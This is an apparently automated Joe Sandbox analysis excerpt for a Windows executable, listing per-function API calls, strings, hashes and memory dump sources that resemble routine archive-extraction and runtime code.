                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: 84de9b57230a59255e9591952898b92051004fad1128f54b85df35e7e447f981
                                                                                                                                    • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                                                                    • Opcode Fuzzy Hash: 84de9b57230a59255e9591952898b92051004fad1128f54b85df35e7e447f981
                                                                                                                                    • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: d98d4f29269d1107f51a07a792933c609c59873a7ecaf05ea7885b42dab371d5
                                                                                                                                    • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                                                                    • Opcode Fuzzy Hash: d98d4f29269d1107f51a07a792933c609c59873a7ecaf05ea7885b42dab371d5
                                                                                                                                    • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: e9f09578398bf8ec26f4b49b33128f51321e6b3fcaf2bfd28fd4b3e7a0d63e33
                                                                                                                                    • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                                                                    • Opcode Fuzzy Hash: e9f09578398bf8ec26f4b49b33128f51321e6b3fcaf2bfd28fd4b3e7a0d63e33
                                                                                                                                    • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: 6e7f55274f890cbab6d7225ad9b81131cc5c267fdfc4ea73b69925217b844075
                                                                                                                                    • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                                                                    • Opcode Fuzzy Hash: 6e7f55274f890cbab6d7225ad9b81131cc5c267fdfc4ea73b69925217b844075
                                                                                                                                    • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                                                                    APIs
                                                                                                                                    • SetEndOfFile.KERNELBASE(?,0036903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00369F0C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 749574446-0
                                                                                                                                    • Opcode ID: dee11678dffa002ed6cc83904fc30bc8a9ae56053490082a976cc1827e45e3dc
                                                                                                                                    • Instruction ID: ea98fe1725eb9460ed20374a3a73965b577d8dd7e54f16aa78fa23687de090d2
                                                                                                                                    • Opcode Fuzzy Hash: dee11678dffa002ed6cc83904fc30bc8a9ae56053490082a976cc1827e45e3dc
                                                                                                                                    • Instruction Fuzzy Hash: 1EA022B008000E8BCE022B32CE0800C3B20FF22BC0B0002E8A00BCF0B2CB23882BCB00
                                                                                                                                    APIs
                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0037AE72,C:\Users\user\Desktop,00000000,003A946A,00000006), ref: 0037AC08
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1611563598-0
                                                                                                                                    • Opcode ID: 04ff0b072d0117875d5413b75d1dc765ca9641d7fa83c35726c626f88a217dda
                                                                                                                                    • Instruction ID: 53db4b9d515396d07b5f37f3f469f2e05255378125d282579719673f75eb735c
                                                                                                                                    • Opcode Fuzzy Hash: 04ff0b072d0117875d5413b75d1dc765ca9641d7fa83c35726c626f88a217dda
                                                                                                                                    • Instruction Fuzzy Hash: E7A011B02002008B82022B328F0AA0EBAAAAFA2B00F00C02AA00080030CB32C820AA02
                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,003695D6,?,?,?,?,?,00392641,000000FF), ref: 0036963B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                    • Opcode ID: cfd5e7fc5e03ad587e48bb7504521719934188e4c0defdcbef0bb462ea8b0268
                                                                                                                                    • Instruction ID: 441de211ebd2e385ae111f729651c0af9a128463dce77d7bec79bb05bc7f5729
                                                                                                                                    • Opcode Fuzzy Hash: cfd5e7fc5e03ad587e48bb7504521719934188e4c0defdcbef0bb462ea8b0268
                                                                                                                                    • Instruction Fuzzy Hash: 17F08270481B15DFDB328B64C459B92B7ECAB12335F049B1FD0E7439E4D771698D8A50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                                                                      • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0037C2B1
                                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0037C2C4
                                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0037C2E0
                                                                                                                                    • SetFocus.USER32(00000000), ref: 0037C2E7
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0037C321
                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0037C358
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0037C36E
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037C38C
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C39C
                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0037C3B8
                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037C3D4
                                                                                                                                    • _swprintf.LIBCMT ref: 0037C404
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0037C417
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0037C41E
                                                                                                                                    • _swprintf.LIBCMT ref: 0037C477
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0037C48A
                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0037C4A7
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0037C4C7
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C4D7
                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0037C4F1
                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037C509
                                                                                                                                    • _swprintf.LIBCMT ref: 0037C535
                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0037C548
                                                                                                                                    • _swprintf.LIBCMT ref: 0037C59C
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0037C5AF
                                                                                                                                      • Part of subcall function 0037AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037AF35
                                                                                                                                      • Part of subcall function 0037AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0039E72C,?,?), ref: 0037AF84
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                    • String ID: %s %s$%s %s %s$P7$REPLACEFILEDLG
                                                                                                                                    • API String ID: 797121971-618955506
                                                                                                                                    • Opcode ID: 6d5b8ee397d928986ad875b24cbd10d4163f10c49ba72454c319a594be144017
                                                                                                                                    • Instruction ID: f61cd2cb42d4e5ee8e183849cc0644f6a614b6b7b071b11c346723ea2d26d3d0
                                                                                                                                    • Opcode Fuzzy Hash: 6d5b8ee397d928986ad875b24cbd10d4163f10c49ba72454c319a594be144017
                                                                                                                                    • Instruction Fuzzy Hash: 2C919672148348BFD633EBA4CC49FFB77ACEB4A704F048819F649D6091D775AA048B62
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00366FAA
                                                                                                                                    • _wcslen.LIBCMT ref: 00367013
                                                                                                                                    • _wcslen.LIBCMT ref: 00367084
                                                                                                                                      • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                                                                      • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                                                                      • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                                                                      • Part of subcall function 0036A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641,000000FF), ref: 0036A1F1
                                                                                                                                      • Part of subcall function 0036A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641), ref: 0036A21F
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00367139
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00367155
                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00367298
                                                                                                                                      • Part of subcall function 00369DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003673BC,?,?,?,00000000), ref: 00369DBC
                                                                                                                                      • Part of subcall function 00369DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00369E70
                                                                                                                                      • Part of subcall function 00369620: CloseHandle.KERNELBASE(000000FF,?,?,003695D6,?,?,?,?,?,00392641,000000FF), ref: 0036963B
                                                                                                                                      • Part of subcall function 0036A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                                                                      • Part of subcall function 0036A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                                    • Opcode ID: a6ad64c0f42aa0ae10ab8193e132a830dfff1a952b074925056b43b2ca8e276f
                                                                                                                                    • Instruction ID: 6f499d96adb8e1d1ff0ad073340ff1cd7a2e49af8aea03cf4381ae7f151d15dd
                                                                                                                                    • Opcode Fuzzy Hash: a6ad64c0f42aa0ae10ab8193e132a830dfff1a952b074925056b43b2ca8e276f
                                                                                                                                    • Instruction Fuzzy Hash: 5EC109B5D04604AADB23DB74CC42FEFB3ACAF04304F40855AF956EB286D734AA44CB61
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                    • Opcode ID: 5caf1bc099ac0b56d847e48cdf6fb9555c41d881e081f4183cf9d43f9e329ebe
                                                                                                                                    • Instruction ID: 127c8040975b9f16711afbff47ad6874f6ea9d25a5383164c9377365a7a7797d
                                                                                                                                    • Opcode Fuzzy Hash: 5caf1bc099ac0b56d847e48cdf6fb9555c41d881e081f4183cf9d43f9e329ebe
                                                                                                                                    • Instruction Fuzzy Hash: 1BC23E71E046288FDB66EF28DD407E9B7B9EB84305F1541EAD44DE7280E775AE818F40
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                                    • Opcode ID: 0dabb1f77bc50d8c08af230b0a68d8889c8371cf84971fdc47f4525719be2699
                                                                                                                                    • Instruction ID: bb0a140c8574d68a9bfe5ab402b53c63367ee23ed4ce000f91a3d293616e21c3
                                                                                                                                    • Opcode Fuzzy Hash: 0dabb1f77bc50d8c08af230b0a68d8889c8371cf84971fdc47f4525719be2699
                                                                                                                                    • Instruction Fuzzy Hash: AB32D6715143849FDF16DF74C895AEA3BA5AF15300F08847DFD8A8F28ADB749A49CB20
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00362874
                                                                                                                                    • _strlen.LIBCMT ref: 00362E3F
                                                                                                                                      • Part of subcall function 003702BA: __EH_prolog.LIBCMT ref: 003702BF
                                                                                                                                      • Part of subcall function 00371B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0036BAE9,00000000,?,?,?,00010474), ref: 00371BA0
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00362F91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                                    • String ID: CMT
                                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                                    • Opcode ID: 234f2cc8a8809684306c40af38ff8f9b87da435e14b2703cdd8b9863459b3f4a
                                                                                                                                    • Instruction ID: d5c001998c3061f9b24ddc0f996a5fc3f251ec19454517dfdaeeafc81a8a52ab
                                                                                                                                    • Opcode Fuzzy Hash: 234f2cc8a8809684306c40af38ff8f9b87da435e14b2703cdd8b9863459b3f4a
                                                                                                                                    • Instruction Fuzzy Hash: 9B6227715006448FDB1ADF38C8966FA3BA1EF55300F09C47EEC9A8F28ADB759945CB60
                                                                                                                                    APIs
                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0037F844
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0037F910
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0037F930
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0037F93A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
